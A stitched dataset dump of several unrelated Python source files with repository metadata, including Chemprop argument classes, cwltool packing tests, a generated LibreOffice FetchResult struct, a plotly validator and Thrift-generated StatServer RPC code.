self._crossval_index_sets = pickle.load(rf)
self.num_folds = len(self.crossval_index_sets)
self.seed = 0
# Test settings
if self.test:
self.epochs = 0
class PredictArgs(CommonArgs):
""":class:`PredictArgs` includes :class:`CommonArgs` along with additional arguments used for predicting with a Chemprop model."""
test_path: str
"""Path to CSV file containing testing data for which predictions will be made."""
preds_path: str
"""Path to CSV file where predictions will be saved."""
@property
def ensemble_size(self) -> int:
"""The number of models in the ensemble."""
return len(self.checkpoint_paths)
def process_args(self) -> None:
super(PredictArgs, self).process_args()
if self.checkpoint_paths is None or len(self.checkpoint_paths) == 0:
raise ValueError('Found no checkpoints. Must specify --checkpoint_path <path> or '
'--checkpoint_dir <dir> containing at least one checkpoint.')
class InterpretArgs(CommonArgs):
""":class:`InterpretArgs` includes :class:`CommonArgs` along with additional arguments used for interpreting a trained Chemprop model."""
data_path: str
"""Path to data CSV file."""
batch_size: int = 500
"""Batch size."""
property_id: int = 1
"""Index of the property of interest in the trained model."""
rollout: int = 20
"""Number of rollout steps."""
c_puct: float = 10.0
"""Constant factor in MCTS."""
max_atoms: int = 20
"""Maximum number of atoms in rationale."""
min_atoms: int = 8
"""Minimum number of atoms in rationale."""
prop_delta: float = 0.5
"""Minimum score to count as positive."""
def process_args(self) -> None:
super(InterpretArgs, self).process_args()
if self.features_path is not None:
raise ValueError('Cannot use --features_path <path> for interpretation since features '
'need to be computed dynamically for molecular substructures. '
'Please specify --features_generator <generator>.')
if self.checkpoint_paths is None or len(self.checkpoint_paths) == 0:
raise ValueError('Found no checkpoints. Must specify --checkpoint_path <path> or '
'--checkpoint_dir <dir> containing at least one checkpoint.')
class HyperoptArgs(TrainArgs):
""":class:`HyperoptArgs` includes :class:`TrainArgs` along with additional arguments used for optimizing Chemprop hyperparameters."""
num_iters: int = 20
"""Number of hyperparameter choices to try."""
config_save_path: str
"""Path to :code:`.json` file where best hyperparameter settings will be written."""
log_dir: str = None
"""(Optional) Path to a directory where all results of the hyperparameter optimization will be written."""
class SklearnTrainArgs(TrainArgs):
""":class:`SklearnTrainArgs` includes :class:`TrainArgs` along with additional arguments for training a scikit-learn model."""
model_type: Literal['random_forest', 'svm']
"""scikit-learn model to use."""
class_weight: Literal['balanced'] = None
"""How to weight classes (None means no class balance)."""
single_task: bool = False
"""Whether to run each task separately (needed when dataset has null entries)."""
radius: int = 2
"""Morgan fingerprint radius."""
num_bits: int = 2048
"""Number of bits in morgan fingerprint."""
num_trees: int = 500
"""Number of random forest trees."""
class SklearnPredictArgs(Tap):
""":class:`SklearnPredictArgs` contains arguments used for predicting with a trained scikit-learn model."""
test_path: str
"""Path to CSV file containing testing data for which predictions will be made."""
smiles_column: str = None
"""Name of the column containing SMILES strings. By default, uses the first column."""
preds_path: str
"""Path to CSV file where predictions will be saved."""
checkpoint_dir: str = None
"""Path to directory containing model checkpoints (:code:`.pkl` file)"""
checkpoint_path: str = None
"""Path to model checkpoint (:code:`.pkl` file)"""
checkpoint_paths: List[str] = None
"""List of paths to model checkpoints (:code:`.pkl` files)"""
def process_args(self) -> None:
# Load checkpoint paths
self.checkpoint_paths = get_checkpoint_paths(
checkpoint_path=self.checkpoint_path,
checkpoint_paths=self.checkpoint_paths,
checkpoint_dir=self.checkpoint_dir,
ext='.pkl'
)
| 42.072016
| 141
| 0.66308
|
a03cd8262a69b431c9d3018ee6c8407f468f1be1
| 7,462
|
py
|
Python
|
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
import json
import os
import tempfile
from functools import partial
from io import StringIO
from tempfile import NamedTemporaryFile
import pytest
import cwltool.pack
import cwltool.workflow
from cwltool import load_tool
from cwltool.context import LoadingContext
from cwltool.load_tool import fetch_document, resolve_and_validate_document
from cwltool.main import main, make_relative, print_pack
from cwltool.pathmapper import adjustDirObjs, adjustFileObjs
from cwltool.resolver import tool_resolver
from ruamel import yaml
from .util import get_data, needs_docker
def test_pack():
loadingContext, workflowobj, uri = fetch_document(get_data("tests/wf/revsort.cwl"))
with open(get_data("tests/wf/expect_packed.cwl")) as packed_file:
expect_packed = yaml.safe_load(packed_file)
packed = cwltool.pack.pack(loadingContext, uri)
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert "$schemas" in packed
assert len(packed["$schemas"]) == len(expect_packed["$schemas"])
del packed["$schemas"]
del expect_packed["$schemas"]
assert packed == expect_packed
def test_pack_input_named_name():
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/trick_revsort.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
with open(get_data("tests/wf/expect_trick_packed.cwl")) as packed_file:
expect_packed = yaml.round_trip_load(packed_file)
packed = cwltool.pack.pack(loadingContext, uri)
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert "$schemas" in packed
assert len(packed["$schemas"]) == len(expect_packed["$schemas"])
del packed["$schemas"]
del expect_packed["$schemas"]
assert packed == expect_packed
def test_pack_single_tool():
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/formattest.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
packed = cwltool.pack.pack(loadingContext, uri)
assert "$schemas" in packed
def test_pack_fragment():
with open(get_data("tests/wf/scatter2_subwf.cwl")) as packed_file:
expect_packed = yaml.safe_load(packed_file)
loadingContext, workflowobj, uri = fetch_document(get_data("tests/wf/scatter2.cwl"))
packed = cwltool.pack.pack(loadingContext, uri + "#scatterstep/mysub")
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert json.dumps(packed, sort_keys=True, indent=2) == json.dumps(
expect_packed, sort_keys=True, indent=2
)
def test_pack_rewrites():
rewrites = {}
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/default-wf5.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
cwltool.pack.pack(
loadingContext, uri, rewrite_out=rewrites,
)
assert len(rewrites) == 6
cwl_missing_version_paths = [
"tests/wf/hello_single_tool.cwl",
"tests/wf/hello-workflow.cwl",
]
@pytest.mark.parametrize("cwl_path", cwl_missing_version_paths)
def test_pack_missing_cwlVersion(cwl_path):
"""Ensure the generated pack output is not missing the `cwlVersion` in case of single tool workflow and single step workflow."""
# Testing single tool workflow
loadingContext, workflowobj, uri = fetch_document(get_data(cwl_path))
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
# generate pack output dict
packed = json.loads(print_pack(loadingContext, uri))
assert packed["cwlVersion"] == "v1.0"
def test_pack_idempotence_tool():
"""Ensure that pack produces exactly the same document for an already packed CommandLineTool."""
_pack_idempotently("tests/wf/hello_single_tool.cwl")
def test_pack_idempotence_workflow():
"""Ensure that pack produces exactly the same document for an already packed workflow."""
_pack_idempotently("tests/wf/count-lines1-wf.cwl")
def _pack_idempotently(document):
loadingContext, workflowobj, uri = fetch_document(get_data(document))
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
# generate pack output dict
packed_text = print_pack(loadingContext, uri)
packed = json.loads(packed_text)
tmp = NamedTemporaryFile(mode="w", delete=False)
try:
tmp.write(packed_text)
tmp.flush()
tmp.close()
loadingContext, workflowobj, uri2 = fetch_document(tmp.name)
loadingContext.do_update = False
loadingContext, uri2 = resolve_and_validate_document(
loadingContext, workflowobj, uri2
)
processobj = loadingContext.loader.resolve_ref(uri2)[0]
# generate pack output dict
packed_text = print_pack(loadingContext, uri2)
double_packed = json.loads(packed_text)
finally:
os.remove(tmp.name)
assert uri != uri2
assert packed == double_packed
cwl_to_run = [
("tests/wf/count-lines1-wf.cwl", "tests/wf/wc-job.json", False),
("tests/wf/formattest.cwl", "tests/wf/formattest-job.json", True),
]
@needs_docker
@pytest.mark.parametrize("wf_path,job_path,namespaced", cwl_to_run)
def test_packed_workflow_execution(wf_path, job_path, namespaced, tmpdir):
loadingContext = LoadingContext()
loadingContext.resolver = tool_resolver
loadingContext, workflowobj, uri = fetch_document(get_data(wf_path), loadingContext)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
packed = json.loads(print_pack(loadingContext, uri))
assert not namespaced or "$namespaces" in packed
wf_packed_handle, wf_packed_path = tempfile.mkstemp()
with open(wf_packed_path, "w") as temp_file:
json.dump(packed, temp_file)
normal_output = StringIO()
packed_output = StringIO()
normal_params = ["--outdir", str(tmpdir), get_data(wf_path), get_data(job_path)]
packed_params = [
"--outdir",
str(tmpdir),
"--debug",
wf_packed_path,
get_data(job_path),
]
assert main(normal_params, stdout=normal_output) == 0
assert main(packed_params, stdout=packed_output) == 0
assert json.loads(packed_output.getvalue()) == json.loads(normal_output.getvalue())
os.close(wf_packed_handle)
os.remove(wf_packed_path)
| 32.30303
| 132
| 0.71978
|
f211396a755b227da6119426ab86a5fe976977a0
| 4,578
|
py
|
Python
|
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Struct Class
# this is an auto-generated file generated by Cheetah
# Namespace: com.sun.star.ucb
# Libre Office Version: 7.3
from ooo.oenv.env_const import UNO_NONE
import typing
class FetchResult(object):
"""
Struct Class
contains data of several rows of a ContentResultSet.
This struct is returned from XFetchProvider.fetch(), for example.
See Also:
`API FetchResult <https://api.libreoffice.org/docs/idl/ref/structcom_1_1sun_1_1star_1_1ucb_1_1FetchResult.html>`_
"""
__ooo_ns__: str = 'com.sun.star.ucb'
__ooo_full_ns__: str = 'com.sun.star.ucb.FetchResult'
__ooo_type_name__: str = 'struct'
typeName: str = 'com.sun.star.ucb.FetchResult'
"""Literal Constant ``com.sun.star.ucb.FetchResult``"""
def __init__(self, Rows: typing.Optional[typing.Tuple[object, ...]] = UNO_NONE, StartIndex: typing.Optional[int] = 0, Orientation: typing.Optional[bool] = False, FetchError: typing.Optional[int] = 0) -> None:
"""
Constructor
Arguments:
Rows (typing.Tuple[object, ...], optional): Rows value.
StartIndex (int, optional): StartIndex value.
Orientation (bool, optional): Orientation value.
FetchError (int, optional): FetchError value.
"""
super().__init__()
if isinstance(Rows, FetchResult):
oth: FetchResult = Rows
self.Rows = oth.Rows
self.StartIndex = oth.StartIndex
self.Orientation = oth.Orientation
self.FetchError = oth.FetchError
return
kargs = {
"Rows": Rows,
"StartIndex": StartIndex,
"Orientation": Orientation,
"FetchError": FetchError,
}
if kargs["Rows"] is UNO_NONE:
kargs["Rows"] = None
self._init(**kargs)
def _init(self, **kwargs) -> None:
self._rows = kwargs["Rows"]
self._start_index = kwargs["StartIndex"]
self._orientation = kwargs["Orientation"]
self._fetch_error = kwargs["FetchError"]
@property
def Rows(self) -> typing.Tuple[object, ...]:
"""
contains the demanded data.
        One any contains the data of one whole row. Those methods which use this struct have to specify what the any has to contain.
"""
return self._rows
@Rows.setter
def Rows(self, value: typing.Tuple[object, ...]) -> None:
self._rows = value
@property
def StartIndex(self) -> int:
"""
indicates the index of the first row contained in FetchResult.Rows in the original result set.
So if FetchResult.StartIndex equals 3, the first element in the sequence FetchResult.Rows contains the data of the index 3 in the original result set.
The following rows are one after the other, but the direction depends on the value of FetchResult.Direction
"""
return self._start_index
@StartIndex.setter
def StartIndex(self, value: int) -> None:
self._start_index = value
@property
def Orientation(self) -> bool:
"""
indicates the orientation in which the rows are fetched and set into the sequence FetchResult.Rows.
When FetchResult.Orientation equals TRUE, the rows in FetchResult.Rows are ordered in the same way as in the original result set.
"""
return self._orientation
@Orientation.setter
def Orientation(self, value: bool) -> None:
self._orientation = value
@property
def FetchError(self) -> int:
"""
indicates whether and which error has occurred, while fetching.
The value may contain zero or more constants of the FetchError constants group.
"""
return self._fetch_error
@FetchError.setter
def FetchError(self, value: int) -> None:
self._fetch_error = value
__all__ = ['FetchResult']
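# --- Usage sketch (not part of the generated module) ---
# A minimal, hypothetical example of constructing and reading a FetchResult;
# the row payloads are placeholder objects rather than real UNO row data.
if __name__ == '__main__':
    result = FetchResult(Rows=('row-1', 'row-2'), StartIndex=3,
                         Orientation=True, FetchError=0)
    print(result.typeName)    # com.sun.star.ucb.FetchResult
    print(result.StartIndex)  # 3
    print(len(result.Rows))   # 2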
| 33.911111
| 212
| 0.643949
|
0f1bf4db8dc7bd6741b979c2d345c13f44c5825d
| 94
|
py
|
Python
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | 3
|
2021-09-26T10:50:35.000Z
|
2022-01-25T02:44:37.000Z
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | 1
|
2021-09-09T14:19:31.000Z
|
2021-09-09T14:19:31.000Z
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | null | null | null |
class Road():
def __init__(self):
self.curves = []
self.curve_table = {}
| 15.666667
| 29
| 0.521277
|
2f95d7f49f4077545aa98069a4fa5f0216750104
| 462
|
py
|
Python
|
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | null | null | null |
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class TickprefixValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name='tickprefix',
parent_name='streamtube.colorbar',
**kwargs
):
super(TickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
**kwargs
)
| 24.315789
| 72
| 0.612554
|
7b06afc32f991d7af528fc9179e7ef21a5fe8cb7
| 15,778
|
py
|
Python
|
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | null | null | null |
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | 3
|
2020-07-17T13:08:35.000Z
|
2021-05-09T19:38:44.000Z
|
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | null | null | null |
#
# Autogenerated by Thrift Compiler (0.9.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def calculateStat(self, allNumbers):
"""
Parameters:
- allNumbers
"""
pass
def generateNums(self):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
return self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "ping failed: unknown result");
def calculateStat(self, allNumbers):
"""
Parameters:
- allNumbers
"""
self.send_calculateStat(allNumbers)
return self.recv_calculateStat()
def send_calculateStat(self, allNumbers):
self._oprot.writeMessageBegin('calculateStat', TMessageType.CALL, self._seqid)
args = calculateStat_args()
args.allNumbers = allNumbers
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_calculateStat(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = calculateStat_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "calculateStat failed: unknown result");
def generateNums(self):
self.send_generateNums()
return self.recv_generateNums()
def send_generateNums(self):
self._oprot.writeMessageBegin('generateNums', TMessageType.CALL, self._seqid)
args = generateNums_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_generateNums(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = generateNums_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "generateNums failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["calculateStat"] = Processor.process_calculateStat
self._processMap["generateNums"] = Processor.process_generateNums
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
result.success = self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_calculateStat(self, seqid, iprot, oprot):
args = calculateStat_args()
args.read(iprot)
iprot.readMessageEnd()
result = calculateStat_result()
result.success = self._handler.calculateStat(args.allNumbers)
oprot.writeMessageBegin("calculateStat", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_generateNums(self, seqid, iprot, oprot):
args = generateNums_args()
args.read(iprot)
iprot.readMessageEnd()
result = generateNums_result()
result.success = self._handler.generateNums()
oprot.writeMessageBegin("generateNums", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class calculateStat_args:
"""
Attributes:
- allNumbers
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'allNumbers', (TType.I32,None), None, ), # 1
)
def __init__(self, allNumbers=None,):
self.allNumbers = allNumbers
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.allNumbers = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in xrange(_size0):
_elem5 = iprot.readI32();
self.allNumbers.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('calculateStat_args')
if self.allNumbers is not None:
oprot.writeFieldBegin('allNumbers', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.allNumbers))
for iter6 in self.allNumbers:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class calculateStat_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StatStruct, StatStruct.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StatStruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('calculateStat_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class generateNums_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('generateNums_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class generateNums_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.I32,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype10, _size7) = iprot.readListBegin()
for _i11 in xrange(_size7):
_elem12 = iprot.readI32();
self.success.append(_elem12)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('generateNums_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter13 in self.success:
oprot.writeI32(iter13)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
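# --- Client usage sketch (not part of the generated code) ---
# A minimal example of calling StatServer over the standard Thrift
# socket/binary-protocol stack; host and port are illustrative assumptions
# and a running server is required.
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#
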